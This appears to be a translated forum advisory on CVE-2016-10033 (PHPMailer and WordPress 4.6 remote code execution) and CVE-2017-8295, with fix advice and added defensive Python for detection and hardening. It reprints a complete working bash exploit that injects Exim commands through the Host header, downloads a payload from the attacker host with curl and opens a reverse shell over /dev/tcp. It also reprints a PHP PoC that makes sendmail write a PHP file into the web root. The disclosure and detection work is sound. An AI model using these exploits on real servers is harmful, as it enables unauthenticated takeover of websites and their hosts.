聚优论坛

PHPMailer hit by a critical remote code execution vulnerability (CVE-2016-10033)

Posted by 卖炭翁 on 2017-5-5 19:50:22

[Update 2017.5.4]

Two fairly high-profile vulnerabilities were disclosed yesterday: CVE-2016-10033 and CVE-2017-8295. Going by the description, the former is an unauthenticated RCE vulnerability in WordPress Core 4.6. In fact it is the same vulnerability FreeBuf already reported last December, so we are updating the original article.

This advisory is the application of the PHPMailer exploitation details to WordPress core. An unauthenticated attacker who exploits the vulnerability can achieve remote code execution, gaining immediate access to the target server and ultimately full compromise of the application server. No plugins or non-standard settings are needed. Wordfence had in fact already noted at the time that the vulnerability affected WP Core.

The new advisory describes a new exploitation vector for the PHP mail() function that works on top of the Exim4 MTA, which is installed by default on systems such as Debian and Ubuntu; this widens the reach of such attacks and raises the severity. Concretely, malicious data injected through the Host field reaches the mail() function, and the -be argument of the sendmail command (in reality a symlink to exim4) is used to execute commands.

These details are only being published now in order to give WordPress and other affected software vendors more time to upgrade the affected mail library, and also to leave more time for CVE-2017-8295 to be fixed.


Affected scope:

The RCE PoC in this advisory targets WordPress 4.6, but other WordPress versions may also be affected.


The author's PoC:
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
# /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
# /____/
#
#
# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
# CVE-2016-10033
#
# wordpress-rce-exploit.sh (ver. 1.0)
#
#
# Discovered and coded by
#
# Dawid Golunski (@dawid_golunski)
# https://legalhackers.com
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
#
# Exploit src URL:
# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
#
#
# Tested on WordPress 4.6:
# https://github.com/WordPress/WordPress/archive/4.6.zip
#
# Usage:
# ./wordpress-rce-exploit.sh target-wordpress-url
#
#
# Disclaimer:
# For testing purposes only
#
#
# -----------------------------------------------------------------
#
# Interested in vulns/exploitation?
#
#
# .;lc'
# .,cdkkOOOko;.
# .,lxxkkkkOOOO000Ol'
# .':oxxxxxkkkkOOOO0000KK0x:'
# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
# '';ldxxxxxdc,. ,oOXXXNNNXd;,.
# .ddc;,,:c;. ,c: .cxxc:;:ox:
# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
# .dxxxxxdl;. ., .. .;cdxxxxxx:
# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
# .':oxxxxxxxxx.ckkkkkkkkxl,.
# .,cdxxxxx.ckkkkkxc.
# .':odx.ckxl,.
# .,.'.
#
# https://ExploitBox.io
#
# https://twitter.com/Exploit_Box
#
# -----------------------------------------------------------------

rev_host="192.168.57.1"

function prep_host_header() {
    cmd="$1"
    rce_cmd="\${run{$cmd}}";

    # replace / with ${substr{0}{1}{$spool_directory}}
    #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
    rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"

    # replace ' ' (space) with
    #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
    rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"

    #return "target(any -froot@localhost -be $rce_cmd null)"
    host_header="target(any -froot@localhost -be $rce_cmd null)"
    return 0
}

#cat exploitbox.ans
intro="
DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"

intro2="
ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="

echo "$intro" | base64 -d
echo "$intro2" | base64 -d

if [ "$#" -ne 1 ]; then
    echo -e "Usage:\n$0 target-wordpress-url\n"
    exit 1
fi
target="$1"

echo -ne "\e[91m[*]\033[0m"
read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
echo

if [ "$choice" == "y" ]; then
    echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
    echo -e "\e[92m[+]\033[0m Connected to the target"

    # Serve payload/bash script on :80
    RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
    echo "$RCE_exec_cmd" > rce.txt
    python -mSimpleHTTPServer 80 2>/dev/null >&2 &
    hpid=$!

    # Save payload on the target in /tmp/rce
    cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
    prep_host_header "$cmd"
    curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
    echo -e "\n\e[92m[+]\e[0m Payload sent successfully"

    # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
    cmd="/bin/bash /tmp/rce"
    prep_host_header "$cmd"
    curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
    echo -e "\n\e[92m[+]\033[0m Payload executed!"

    echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
    nc -vv -l 1337
    echo
else
    echo -e "\e[92m[+]\033[0m Responsible choice ;)  Exiting.\n"
    exit 0
fi

echo "Exiting..."
exit 0
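The PoC above works because the Host header travels, unchanged, into the envelope sender that PHP mail() hands to exim4, so the injected value has a recognisable shape: Exim string expansions such as ${run{...}} and ${substr{...}}, the -be option, and a value that is not a hostname at all. The following Python is an added example (not from the advisory or from WordPress) of a detection rule that scans JSON-lines access-log records for that shape; the log records, field names (client, uri, host) and the placeholder command are constructed for the example.

```python
"""Detection for the Host-header vector of CVE-2016-10033 (added example, not from the advisory).

The PoC places an Exim command line in the HTTP Host header; WordPress copies the
header into the From address of the password-reset mail, PHP mail() hands it to
sendmail (exim4), and "-be" plus "${run{...}}" turn it into command execution.
A legitimate Host header is a hostname with an optional port, so both the
injection tokens and any non-hostname value are worth an alert.
"""
import json
import re
from typing import List, Optional, Tuple

# RFC 1123 hostname, optionally followed by :port (bracketed IPv6 literals are deliberately not accepted)
HOST_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{HOST_LABEL}\.)*{HOST_LABEL}\.?(?::\d{{1,5}})?$", re.IGNORECASE)

# Tokens taken from the published PoC: the Exim string expansions it uses to build and
# encode the command, and the sendmail/exim options it smuggles into the header.
INJECTION_RE = re.compile(
    r"\$\{\s*(?:run|substr)\s*\{"          # ${run{...}} / ${substr{...}{...}{...}}
    r"|(?:^|[\s(])-(?:be|f|oQ|X)"           # -be, -froot@..., -oQ, -X after whitespace or '('
    r"|\$(?:spool_directory|tod_log)\b"      # variables the PoC uses to encode '/' and ' '
)


def classify_host_header(value: Optional[str]) -> Optional[str]:
    """Return a reason if the Host header is malicious or malformed, else None."""
    if not value:
        return None  # no Host header (HTTP/1.0 client): nothing to inspect here
    m = INJECTION_RE.search(value)
    if m:
        return f"exim/sendmail injection token {m.group(0).strip()!r}"
    hostname = re.sub(r":\d{1,5}$", "", value)
    if len(hostname) > 253 or not HOSTNAME_RE.match(value):
        return "Host header is not a syntactically valid hostname"
    return None


def find_host_header_injection(log_lines) -> List[Tuple[str, str, str]]:
    """Scan JSON-lines access-log records; return (client, uri, reason) per suspicious request."""
    findings = []
    for line in log_lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip a damaged record instead of aborting the whole scan
        reason = classify_host_header(rec.get("host"))
        if reason:
            findings.append((rec.get("client", "?"), rec.get("uri", "?"), reason))
    return findings


# Constructed sample records (no real server involved). The first mirrors the shape the PoC
# builds, with the actual command replaced by a placeholder; the last has a space in the host.
SAMPLE_LOG = """
{"client": "203.0.113.7", "method": "POST", "uri": "/wp-login.php?action=lostpassword", "host": "target(any -froot@localhost -be ${run{REDACTED_CMD}} null)", "status": 200}
{"client": "198.51.100.4", "method": "GET", "uri": "/", "host": "blog.example.com", "status": 200}
{"client": "198.51.100.9", "method": "GET", "uri": "/feed/", "host": "blog.example.com:8443", "status": 200}
{"client": "203.0.113.8", "method": "POST", "uri": "/wp-login.php?action=lostpassword", "host": "evil host.example", "status": 200}
""".strip().splitlines()

if __name__ == "__main__":
    for client, uri, reason in find_host_header_injection(SAMPLE_LOG):
        print(f"{client} {uri}: {reason}")
```

The two checks are deliberately layered: the token regex catches this specific PoC family, while the hostname-syntax check catches anything else that is not a plausible Host value, which is the property a front-end proxy or WAF should enforce regardless of the MTA behind the application.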

The other newly disclosed vulnerability mentioned above, CVE-2017-8295, is rated between Medium and High (not Critical) and affects WordPress Core <= 4.7.4.

In outline: WordPress has a password reset feature, and a flaw in it can, under certain conditions, let an attacker obtain the password reset link without authentication, and with it take over the target user's WordPress account.

The root cause is that WordPress by default uses untrusted data when constructing the password reset e-mail. Click here for the specific exploitation method. WordPress has no official fix for the problem yet; the following workaround can be used:

Enable UseCanonicalName to enforce a static SERVER_NAME value

https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname

According to the author, the issue was reported to the WordPress security team several times, the first in July of last year, but no corresponding response was ever received.
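To make the workaround concrete: WordPress derives the From address of its own mail from SERVER_NAME (wordpress@<SERVER_NAME>, with a leading "www." dropped), and with UseCanonicalName Off Apache fills SERVER_NAME from the client's Host header. The Python below is an added example, not WordPress or Apache code, that models the two settings side by side; the fallback behaviour for a missing or malformed Host header and the host names used are assumptions made for the example.

```python
"""Model of Apache's UseCanonicalName as the workaround for CVE-2017-8295 (added example, not WordPress code).

WordPress builds the From address of its password-reset mail from SERVER_NAME (by default
wordpress@<SERVER_NAME>, minus a leading "www."). With UseCanonicalName Off, Apache fills
SERVER_NAME from the client's Host header, so the attacker controls that address; with
UseCanonicalName On it is always the configured ServerName.
"""
import re

HOST_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{HOST_LABEL}\.)*{HOST_LABEL}\.?$", re.IGNORECASE)


def effective_server_name(host_header, server_name, use_canonical_name):
    """SERVER_NAME as the application sees it for one request.

    Simplification (assumption, not Apache source): a missing or malformed Host header falls
    back to the configured ServerName instead of being rejected with a 400.
    """
    if use_canonical_name:
        return server_name.lower()
    host = re.sub(r":\d{1,5}$", "", (host_header or "").strip()).lower()
    if not host or not HOSTNAME_RE.match(host):
        return server_name.lower()
    return host


def reset_mail_from(server_name):
    """Default From address of WordPress mail when no plugin overrides wp_mail()."""
    sitename = server_name.lower()
    if sitename.startswith("www."):
        sitename = sitename[4:]
    return "wordpress@" + sitename


def reset_mail_from_for_request(host_header, server_name, use_canonical_name):
    """From address the password-reset mail will carry for a given request and Apache setting."""
    return reset_mail_from(effective_server_name(host_header, server_name, use_canonical_name))


if __name__ == "__main__":
    for setting in (False, True):
        print("UseCanonicalName", "On " if setting else "Off", "->",
              reset_mail_from_for_request("attacker.example", "blog.example.com", setting))
```

With the setting off, a request carrying `Host: attacker.example` yields a reset mail whose sender domain belongs to the attacker; with it on, the sender is fixed to the configured ServerName whatever the request says, which is exactly why the workaround needs `ServerName` set explicitly alongside `UseCanonicalName On`.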

[Original article, 2016.12.27]

The remote code execution vulnerability disclosed this time is in PHPMailer, arguably the world's most popular e-mail sending class, said to have roughly 9 million users worldwide, a number still growing every day.

GitHub describes PHPMailer as "probably the world's most popular code for sending email from PHP. It is used by many open-source projects, including WordPress, Drupal, 1CRM, Joomla!". The vulnerability's reach is therefore broad, and it is rated Critical, the highest level.

CVE ID

CVE-2016-10033

Affected versions

PHPMailer < 5.2.18

Severity

High

Description

Independent researcher Dawid Golunski discovered the vulnerability. A remote attacker can use it to execute arbitrary code in the context of the web server's user account and compromise the web application. The flaw is exploited mainly through common web forms that send e-mail, such as feedback forms, registration forms and password reset forms.

The researcher has not disclosed the details, in order to give site administrators more time to upgrade the PHPMailer class before they are affected.

PoC

Dawid Golunski has in fact built a working RCE PoC, which will be published a little later. A video PoC is available at: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Update: the PoC code has been published; site owners should upgrade as soon as possible!

<?php
/*
PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]

which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:

09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--

See the full advisory URL for details.
*/

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form
$email_from = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";

// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');

$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");
$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);

if(!$mail->Send()) {
    echo "Mailer Error: " . $mail->ErrorInfo;
} else {
    echo "Message sent!\n";
}
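The PoC works because the vulnerable PHPMailer passed "-f" plus the sender address to mail() as the extra-parameters string, and PHP runs the sendmail binary through a shell, so quotes and spaces in an address that still looks like a valid RFC 3696 address become separate arguments. The Python below is an added example (not PHPMailer or PHP source) that reproduces that argument split for the sender string exactly as printed above and shows the defensive counterpart: a strict sender check and an argv built without a shell. The escape function is an approximation of PHP's escapeshellcmd() quote-pairing rule, and the sendmail path and "-t -i" flags are the PHP defaults assumed for the example.

```python
"""Why the PoC's From address turns into extra sendmail arguments, and a check that rejects
it (added example; not PHPMailer or PHP code)."""
import re
import shlex

# Characters PHP's escapeshellcmd() backslash-escapes (approximation of the PHP rule)
_SHELL_META = set("#&;`|*?~<>^()[]{}$\\\n\xff")


def escape_shell_cmd(s):
    """Approximate escapeshellcmd(): escape metacharacters, and escape a quote only when it
    has no matching partner later in the string (paired quotes pass through untouched)."""
    out = []
    partner = None  # index of the closing quote of the pair currently open, if any
    for i, c in enumerate(s):
        if c in ('"', "'"):
            if partner is None:
                j = s.find(c, i + 1)
                if j == -1:
                    out.append("\\")  # unpaired quote: escaped
                else:
                    partner = j       # opening quote of a pair: left as is
            elif partner == i:
                partner = None        # closing quote of the pair: left as is
            else:
                out.append("\\")      # a different quote type inside a pair: escaped
        elif c in _SHELL_META:
            out.append("\\")
        out.append(c)
    return "".join(out)


def sendmail_argv_vulnerable(sender):
    """argv sendmail receives when '-f' + sender is escaped and then split by the shell,
    as with PHPMailer < 5.2.18 on top of PHP mail()."""
    return ["/usr/sbin/sendmail", "-t", "-i"] + shlex.split(escape_shell_cmd("-f" + sender))


# Deliberately narrower than RFC 3696: no quoted local parts, no whitespace, no quotes
_STRICT_ADDR = re.compile(r"^[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")


def is_safe_sender(sender):
    """Accept only addresses a shell cannot reinterpret: strict syntax and unchanged by escaping."""
    return bool(_STRICT_ADDR.match(sender)) and escape_shell_cmd(sender) == sender


def sendmail_argv_hardened(sender):
    """Validate, then pass the envelope sender as ONE argv element with no shell in between."""
    if not is_safe_sender(sender):
        raise ValueError("refusing unsafe envelope sender")
    return ["/usr/sbin/sendmail", "-t", "-i", "-f" + sender]


def is_rejected(sender):
    """True if the hardened builder refuses this sender."""
    try:
        sendmail_argv_hardened(sender)
    except ValueError:
        return True
    return False


# The From address from the PoC above, verbatim
POC_SENDER = '"attacker" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com'

if __name__ == "__main__":
    for n, arg in enumerate(sendmail_argv_vulnerable(POC_SENDER)):
        print(f"Arg no. {n} == [{arg}]")
    print("hardened rejects PoC sender:", is_rejected(POC_SENDER))
    print("hardened argv:", sendmail_argv_hardened("alice@example.com"))
```

Note the order of the two defences: the strict syntax check alone would already reject this input, but the "unchanged by escaping" test is what guards against the general class, since any character the shell might treat specially makes the address fail it. Running the sendmail binary directly with an argument vector, rather than through a shell command line, removes the splitting step the PoC depends on.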

Fix

Upgrade to 5.2.18: https://github.com/PHPMailer/PHPMailer

The details have been submitted to the PHPMailer maintainers, who have released PHPMailer 5.2.18 as an emergency security fix addressing the issue; affected users should upgrade immediately. For details see:

https://github.com/PHPMailer/PHPMailer/blob/master/changelog.md

https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md

